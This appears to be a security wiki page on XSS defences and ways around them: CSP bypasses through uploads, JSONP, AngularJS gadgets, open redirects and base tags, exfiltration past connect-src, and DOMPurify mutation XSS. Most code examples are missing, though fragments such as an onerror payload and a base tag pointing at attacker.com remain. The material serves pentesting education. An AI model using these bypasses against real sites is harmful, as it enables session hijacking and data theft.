Protections
Protections
XSS is a well-known issue, and many protections try to limit its possibility on websites. There are basically two cases a website needs to handle when reflecting a user's content:
Content, but no HTML is allowed (almost all data)
Limited HTML tags are allowed (rich text like editors)
The 1st is very easily protected by using HTML Encoding. Many frameworks already do this by default, and explicitly have you write some extra code to turn it off. Most often this encodes only the special characters like <
to <
, >
to >
, and "
to "
. While this type of protection is completely safe in most cases, some situations exist where these specific characters are not required to achieve XSS. We've seen examples of Attribute Injection where a '
single quote is used instead, which may not be encoded and thus can be escaped. Or when your attribute is not enclosed at all and a simple space character can add another malicious attribute. With Script Injection this is a similar story, as well as DOM XSS.
The 2nd case is very hard to protect securely. First, because many tags have unexpected abilities, like the <a href=javascript:alert()>
protocol. If posting links is allowed, they need to think about preventing the javascript:
protocol specifically and allowing regular https://
links. There exist a ton of different tags and attributes that can execute JavaScript (see the Cheat Sheet) making a blocklist almost infeasible, and an allowlist should be used. The second reason this is hard is because browsers are weird, like really weird. The HTML Specification contains a lot of rules and edge cases a filter should handle. If a filter parses a specially crafted payload differently from a browser, the malicious data might go unnoticed and end up executing in the victim's browser.
Content Security Policy (CSP)
A more modern protection against XSS and some other attacks is the Content Security Policy. This is a Header (Content-Security-Policy:
) or <meta>
value in a response that tells the browser what should be allowed, and what shouldn't. An important directive that can be set using this header is script-src
, defining where JavaScript code may come from:
With the above policy set, any <script src=...>
that is not from the current domain or "example.com" will be blocked. When you explicitly set a policy like this it also disables inline scripts like <script>alert()</script>
or event handlers like <style onload=alert()>
from executing, even ones from the server itself as there is no way to differentiate between intended and malicious. This possibly breaking change where all scripts need to come from trusted URLs is sometimes "fixed" by adding a special 'unsafe-inline'
string that allows inline script tags and event handlers to execute, which as the name suggests, is very unsafe.
A different less-common way to allow inline scripts without allowing all inline scripts is with nonces, random values generated by the server. This nonce is put inside of the script-src
directive like 'nonce-2726c7f26c'
, requiring every inline script to have a nonce=
attribute equaling the specified random value. In theory, an attacker should not be able to predict this random value as it should be different for every request. This works in a similar way to CSRF tokens and relies on secure randomness by the server. If implemented well, this is a very effective way of preventing XSS.
The last important string in this directive is 'unsafe-eval'
which is disabled by default, blocking several functions that can execute code from a string:
eval()
Function()
Passing a string to
setTimeout()
,setInterval()
orwindow.setImmediate()
(for example:setTimeout("alert()", 500)
)
Note however that this does not prevent all methods of executing code from a string. If 'unsafe-inline'
allows it, you can still write to the DOM with event handlers if required:
To easily evaluate and find problems with a CSP header, you can use Google's CSP Evaluator which tells you for every directive what potential problems it finds
Hosting JavaScript on 'self'
The URLs and 'self'
trust all scripts coming from that domain, meaning in a secure environment no user data should be stored under those domains, like uploaded JavaScript files. If this is allowed, an attacker can simply upload and host their payload on an allowed website and it is suddenly trusted by the CSP.
/uploads/payload.js
PayloadCopy
For more complex scenarios where you cannot directly upload .js
files, the Content-Type:
header comes into play. The browser decides based on this header if the requested file is likely to be a real script, and if the type is image/png
for example, it will simply refuse to execute it:
Some more ambiguous types are allowed, however, like text/plain
, text/html
or no type at all. These are especially useful as commonly a framework will decide what Content-Type
to add based on the file extension, which may be empty in some cases causing it to choose a type allowed for JavaScript execution. This ambiguity is prevented however with an extra X-Content-Type-Options: nosniff
header that is sometimes set, making the detection from the browser a lot more strict and only allowing real application/javascript
files (full list).
An application may sanitize uploaded files by checking for a few signatures if it looks like a valid PNG, JPEG, GIF, etc. file which can limit exploitability as it still needs to be valid JavaScript code without SyntaxError
s. In these cases, you can try to make a "polyglot" that passes the validation checks of the server, while remaining valid JavaScript by using the file format in a smart way and language features like comments to remove unwanted code.
Another idea instead of storing data, is reflecting data. If there is any page that generates a response you can turn into valid JavaScript code, you may be able to abuse it for your payload. JSONP or other callback endpoints are also useful here as they always have the correct Content-Type
, and may allow you to insert arbitrary code in place of the ?callback=
parameter, serving as your reflection of valid JavaScript code.
Exfiltrating with strict connect-src
This directive defines which hosts can be connected to, meaning if your attacker's server is not on the list, you cannot make a fetch()
request like normal to your server in order to exfiltrate any data. While there is no direct bypass for this, you may be able to still connect to any origin allowed to exfiltrate data by storing it, and later retrieving it as the attacker at a place you can find. By Forcing requests - fetch(), you could, for example, make a POST request that changes a profile picture, or some other public data, while embedding the data you want to exfiltrate. This way the policy is not broken, but the attacker can still find the data on the website itself.
With this technique, remember that even one bit of information is enough, as you can often repeat it to reveal a larger amount of information.
A more general bypass for this is to redirect the user fully using JavaScript, as browsers do not prevent this. Then in the URL, you put the data you want to exfiltrate to receive it in a request:
Another useful method is WebRTC which bypasses connect-src
. The DNS lookup is not blocked and allows for dynamically inserting data into the subdomain field. These names are case-insensitive so an encoding scheme like Base32 can be used to exfiltrate arbitrary data (max ~100 characters per request). Using interactsh
it is easy to set up a domain to exfiltrate from:
Then we use the WebRTC trick to exfiltrate any data over DNS:
Finally, we receive DNS requests on the interactsh-client
that we can decode:
interactsh-client :
CDNs in script-src
(AngularJS Bypass + JSONP)
Every origin in this directive is trusted with all URLs it hosts. A common addition here is CDN (Content Delivery Network) domains that host many different JavaScript files for libraries. While in very unrestricted situations a CDN like unpkg.com will host every file on NPM, even malicious ones, others are less obvious.
The cdnjs.cloudflare.com or ajax.googleapis.com domains for example host only specific popular libraries which should be secure, but some have exploitable features. The most well-known is AngularJS, which a vulnerable site may also host themselves removing the need for a CDN. This library searches for specific patterns in the DOM that can define event handlers without the regular inline syntax. This bypasses the CSP and can allow arbitrary JavaScript execution by loading such a library, and including your own malicious content in the DOM:
Loading any of these blocks in a CSP that allows it, will trigger the alert(document.domain)
function. A common pattern for finding these bypasses is using Angular to create an environment where code can be executed from event handlers, and then another library or callback function to click on the element, triggering the handler with your malicious code.
See jsonp.txt for a not-so-updated list of public JSONP endpoints you may find useful.
CSP Bypass SearchPublic list of Angular/JSONP gadgets for CSP Bypasses
See AngularJS for more complex AngularJS injections that bypass filters. Also, note that other frameworks such as VueJS or HTMX may allow similar bypasses if they are accessible when unsafe-eval
is set in the CSP.
Redirect to upper directory
URLs in a CSP may be absolute, not just an origin. The following example provides a full URL to base64.min.js
, and you would expect only that script could be loaded from the cdn.js.cloudflare.com
origin.
This is not entirely true, however. If another origin, like 'self'
contains an Open Redirect vulnerability, you may redirect a script URL to any path on cdnjs.cloudflare.com
!
Sandbox-iframe XSS challenge solution - Johan CarlssonJohan CarlssonChallenge writeup involving CSP open redirect bypass
The following script would be allowed by the CSP spec, note that the angular.js
path is not normally allowed, but it is through the redirect because its origin is allowed. This can be abused with some HTML that executes arbitrary JavaScript, even if 'unsafe-eval'
is not set:
Nonce without base-src
If a CSP filters scripts based on a nonce, and does not specify a base-src
directive, you may be able to hijack relative URLs after your injection point.
Let's say the target page with an HTML-injection looks as follows:
The relative <script>
tag can be redirect to another domain using the <base>
tag as follows:
Now, the script with a valid nonce is loaded from https://attacker.com/script.js
instead of the target website!
Filter Bypasses
Some of the most useful and common filter bypasses are shown in Common Filter Bypasses.
If a server is checking your input for suspicious strings, they will have a hard time as there are many ways to obfuscate your payloads. Even a simple <a href=...>
tag has many places where the browser allows special and unexpected characters, which may break the pattern the server is trying to search for. Here is a clear diagram showing where you can insert what characters:
The XSS Cheat Sheet by PortSwigger has an extremely comprehensive list of all possible tags, attributes, and browsers that allow JavaScript execution, with varying levels of user interaction:
You can use the above list to filter certain tags you know are allowed/blocked, and copy all payloads for fuzzing using a tool to find what gets through a filter.
JavaScript payload
In case you are able to inject JavaScript correctly but are unable to exploit it due to the filter blocking your JavaScript payload, there are many tricks to still achieve code execution. One of them is using the location
variable, which can be assigned to a javascript:
URL just like in DOM XSS, but this is now a very simple function call trigger as we don't need parentheses or backticks, as we can escape them in a string like \x28
and \x29
.
In fact, we can even go one step further and use the global name
variable which is controllable by an attacker. So global, that it persists between navigations. When a victim visits our site like in an XSS scenario, we can set the name
variable to any payload we like and redirect to the vulnerable page to trigger it (see this video for more info and explanation):
JavaScript Payload :
Attacker's page :
Mutation XSS & DOMPurify
Mutation XSS is a special kind of XSS payload where you are abusing a difference in the checking environment vs. the destination environment. There are some special browser rules for when HTML finds itself in certain tags, that are different from inside other tags. This difference can sometimes be abused to create a benign payload in the checking context but will be mutated by the browser in a different context into a malicious payload.
Let's take the following example: The DOMPurify sanitizer is used to filter out malicious content that could trigger JavaScript execution, which it does perfectly on the following string:
DOMPurify :
There is a <p>
tag with "</title><img src=x onerror=alert()>"
as its id=
attribute, nothing more, and nothing that would trigger JavaScript surely. But then comes along the browser, which sees this payload placed into the DOM, inside the existing <title>
tag:
Browser DOM :
Perhaps surprisingly, it is parsed differently now that it is inside of the <title>
tag. Instead of a simple <p>
tag with an id=
attribute, this turned into the following after mutation:
Browser DOM after mutation :
See what happened here? It suddenly closed with the </title>
tag and started an <img>
tag with the malicious onerror=
attribute, executing JavaScript, and causing XSS! This means in the following example, alert(1)
fires but alert(2)
does not:
Demo :
DOMPurify does not know of the <title>
tag the application puts it in later, so it can only say if the HTML is safe on its own. In this case, it is, so we bypass the check through Mutation XSS.
A quick for-loop later we can find that this same syntax works for all these tags: iframe
, noembed
, noframes
, noscript
, script
, style
, textarea
, title
, xmp
These types of Mutation XSS tricks are highly useful in bypassing simpler sanitizer parsers because DOMPurify had to really put in some effort to get this far. Writing payloads that put the real XSS in an attribute and use mutation to escape out of it can be unexpected and the developers may not have thought about the possibility, and only use some regexes or naive parsing.
Where this gets really powerful is using HTML encoding if the sanitizer parses the payload, and then reassembles the HTML afterward, for example:
There is also another interesting exploitable scenario, where your input is placed inside an <svg>
tag after sanitization:
This is another DOMPurify "bypass" with a more common threat, all a developer needs to do is put your payload inside of an <svg>
tag, without sanitizing it with the <svg>
tag. This payload is a bit more complicated as you'll see, but here's a breakdown: The trick is the difference between SVG parsing and HTML parsing. In HTML which DOMPurify sees, the <style>
tag is special as it switches the parsing context to CSS, which doesn't support comments like <!--
and it won't be interpreted as such. Therefore the </style>
closes it and the <a id="...">
opens another innocent tag and attribute. DOMPurify doesn't notify anything wrong here and won't alter the input. In SVG, however, the <style>
tag doesn't exist and it is interpreted as any other invalid tag in XML. The children inside might be more tags, a <!--
comment in this case. This only ends at the start of the <a id="--!>
attribute and that means after the comment comes more raw HTML. Then our <img onerror=>
tag is read for real and the JavaScript is executed!
Tip: Instead of a comment, another possibility is using the special <![CDATA[
... ]]
syntax in SVGs that abuses a similar parsing difference:
DOMPurify outdated versions
While the abovementioned tricks can get around specific situations, an outdated version of the dompurify
library can cause every output to be vulnerable by completely bypassing DOMPurify in a regular context. The latest vulnerable version is 2.2.3 with a complete bypass found by @TheGrandPew in dec. 2020. The following payload will trigger alert()
when sanitized and put into a regular part of the DOM:
DOMPurify 2.2.3 Bypass
Last updated